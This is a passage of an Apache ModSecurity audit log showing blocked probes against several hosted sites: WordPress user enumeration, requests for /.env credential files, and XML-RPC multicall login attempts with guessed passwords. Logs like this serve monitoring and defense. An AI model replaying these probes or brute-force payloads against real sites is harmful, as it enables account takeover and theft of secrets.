X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d19fb55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d19fb55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748123162350856 3564 (- - -) Stopwatch2: 1748123162350856 3564; combined=1599, p1=611, p2=957, p3=0, p4=0, p5=31, sr=201, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d19fb55-Z-- --0f52343e-A-- [25/May/2025:04:48:08 +0700] aDI-mNerygsLmB9N_YQcNAAAAJg 103.236.140.4 37484 103.236.140.4 8181 --0f52343e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.69.145.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.69.145.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0f52343e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f52343e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748123288225246 2832 (- - -) Stopwatch2: 1748123288225246 2832; combined=1254, p1=425, p2=798, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f52343e-Z-- --ba10b712-A-- [25/May/2025:06:02:35 +0700] aDJQC3awJq5017Xs8D6X5AAAANI 103.236.140.4 40916 103.236.140.4 8181 --ba10b712-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.241.208.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.241.208.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba10b712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba10b712-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748127755953482 3329 (- - -) Stopwatch2: 1748127755953482 3329; combined=1439, p1=479, p2=928, p3=0, p4=0, p5=31, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba10b712-Z-- --87959551-A-- [25/May/2025:06:42:38 +0700] aDJZbterygsLmB9N_YQnRQAAAII 103.236.140.4 44170 103.236.140.4 8181 --87959551-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 13.250.163.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.250.163.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --87959551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87959551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748130158508789 2481 (- - -) Stopwatch2: 1748130158508789 2481; combined=1171, p1=383, p2=760, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87959551-Z-- --f31d2823-A-- [25/May/2025:06:45:41 +0700] aDJaJderygsLmB9N_YQnUAAAAJc 103.236.140.4 44292 103.236.140.4 8181 --f31d2823-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 175.100.17.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 175.100.17.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f31d2823-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f31d2823-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748130341570618 2809 (- - -) Stopwatch2: 1748130341570618 2809; combined=1274, p1=415, p2=829, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f31d2823-Z-- --6148fe04-A-- [25/May/2025:06:50:38 +0700] aDJbTnP6UgzLD1l8HTrNpwAAABc 103.236.140.4 44416 103.236.140.4 8181 --6148fe04-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 Accept-Charset: utf-8 --6148fe04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6148fe04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748130638664939 779 (- - -) Stopwatch2: 1748130638664939 779; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6148fe04-Z-- --d43adf1a-A-- [25/May/2025:06:53:13 +0700] aDJb6REdxfhJOSxH8A_H5gAAAFA 103.236.140.4 44432 103.236.140.4 8181 --d43adf1a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.181.59.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.181.59.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d43adf1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43adf1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748130793453558 3524 (- - -) Stopwatch2: 1748130793453558 3524; combined=1481, p1=485, p2=964, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43adf1a-Z-- --db578320-A-- [25/May/2025:07:08:55 +0700] aDJflxEdxfhJOSxH8A_H-gAAAFI 103.236.140.4 44716 103.236.140.4 8181 --db578320-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.254.64.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.254.64.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --db578320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db578320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748131735626801 3530 (- - -) Stopwatch2: 1748131735626801 3530; combined=1500, p1=506, p2=955, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db578320-Z-- --0992ef74-A-- [25/May/2025:07:41:25 +0700] aDJnNXawJq5017Xs8D6ZSwAAANQ 103.236.140.4 46082 103.236.140.4 8181 --0992ef74-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0992ef74-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix@123321 --0992ef74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0992ef74-E-- --0992ef74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748133685807131 6516 (- - -) Stopwatch2: 1748133685807131 6516; combined=4624, p1=538, p2=3878, p3=0, p4=0, p5=137, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0992ef74-Z-- --45852229-A-- [25/May/2025:07:47:20 +0700] aDJomNerygsLmB9N_YQo6wAAAJg 103.236.140.4 46432 103.236.140.4 8181 --45852229-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --45852229-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi2023 --45852229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45852229-E-- --45852229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748134040403966 6605 (- - -) Stopwatch2: 1748134040403966 6605; combined=4647, p1=576, p2=3892, p3=0, p4=0, p5=106, sr=102, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45852229-Z-- --afd28c26-A-- [25/May/2025:07:51:35 +0700] aDJpl3P6UgzLD1l8HTrN8wAAABE 103.236.140.4 46538 103.236.140.4 8181 --afd28c26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.20.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.20.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --afd28c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afd28c26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748134295933043 762 (- - -) Stopwatch2: 1748134295933043 762; combined=338, p1=302, p2=0, p3=0, p4=0, p5=36, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afd28c26-Z-- --88c24e4f-A-- [25/May/2025:08:05:53 +0700] aDJs8derygsLmB9N_YQpMgAAAII 103.236.140.4 46746 103.236.140.4 8181 --88c24e4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.110.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.110.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88c24e4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88c24e4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748135153039789 3406 (- - -) Stopwatch2: 1748135153039789 3406; combined=1522, p1=518, p2=971, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88c24e4f-Z-- --b19e5c12-A-- [25/May/2025:08:13:10 +0700] aDJupnawJq5017Xs8D6Z-QAAANY 103.236.140.4 49602 103.236.140.4 8181 --b19e5c12-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b19e5c12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b19e5c12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748135590265194 696 (- - -) Stopwatch2: 1748135590265194 696; combined=296, p1=258, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b19e5c12-Z-- --645ec904-A-- [25/May/2025:08:52:03 +0700] aDJ3w3awJq5017Xs8D6bbwAAAMk 103.236.140.4 54354 103.236.140.4 8181 --645ec904-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.245.28.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.245.28.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --645ec904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --645ec904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748137923229549 2175 (- - -) Stopwatch2: 1748137923229549 2175; combined=1005, p1=350, p2=628, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --645ec904-Z-- --e19d1004-A-- [25/May/2025:09:03:17 +0700] aDJ6ZderygsLmB9N_YQwSQAAAIg 103.236.140.4 49408 103.236.140.4 8181 --e19d1004-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.59.200.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.59.200.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e19d1004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e19d1004-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748138597093122 2503 (- - -) Stopwatch2: 1748138597093122 2503; combined=1421, p1=459, p2=930, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e19d1004-Z-- --e6571a39-A-- [25/May/2025:09:22:27 +0700] aDJ-43P6UgzLD1l8HTrilAAAAAc 103.236.140.4 51806 103.236.140.4 8181 --e6571a39-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 192.254.250.182 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 192.254.250.182 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e6571a39-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi& --e6571a39-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6571a39-E-- --e6571a39-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748139747192150 7017 (- - -) Stopwatch2: 1748139747192150 7017; combined=5147, p1=537, p2=4339, p3=39, p4=44, p5=112, sr=84, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6571a39-Z-- --c7705d77-A-- [25/May/2025:09:34:27 +0700] aDKBs3P6UgzLD1l8HTrrtAAAABc 103.236.140.4 60058 103.236.140.4 8181 --c7705d77-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c7705d77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7705d77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748140467040182 833 (- - -) Stopwatch2: 1748140467040182 833; combined=311, p1=276, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7705d77-Z-- --daa4ea10-A-- [25/May/2025:09:35:03 +0700] aDKB13awJq5017Xs8D66fQAAANg 103.236.140.4 33720 103.236.140.4 8181 --daa4ea10-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --daa4ea10-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix1985 --daa4ea10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa4ea10-E-- --daa4ea10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified 